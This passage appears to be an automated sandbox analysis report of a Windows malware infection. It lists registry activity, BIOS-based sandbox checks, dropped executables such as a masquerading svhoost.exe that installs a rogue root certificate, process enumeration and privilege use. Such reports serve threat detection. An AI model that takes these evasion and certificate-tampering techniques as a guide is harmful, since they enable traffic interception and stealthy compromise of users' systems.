Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133617333282974790" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1226833921" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe1100000009c6e09240a1da01a96b3ab041b4da01a96b3ab041b4da0114000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 = 4400310000000000c158798410006100340009000400efbec1587884c15879842e000000e8330200000009000000000000000000000000000000b5d4b0006100000010000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "10" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 020000000100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = 00000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\NodeSlot = "12" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\0\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\NodeSlot = "11" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1226833921" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\2\MRUListEx = ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Documents" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e80922b16d365937a46956b92703aca08af0000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\New Text Document.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
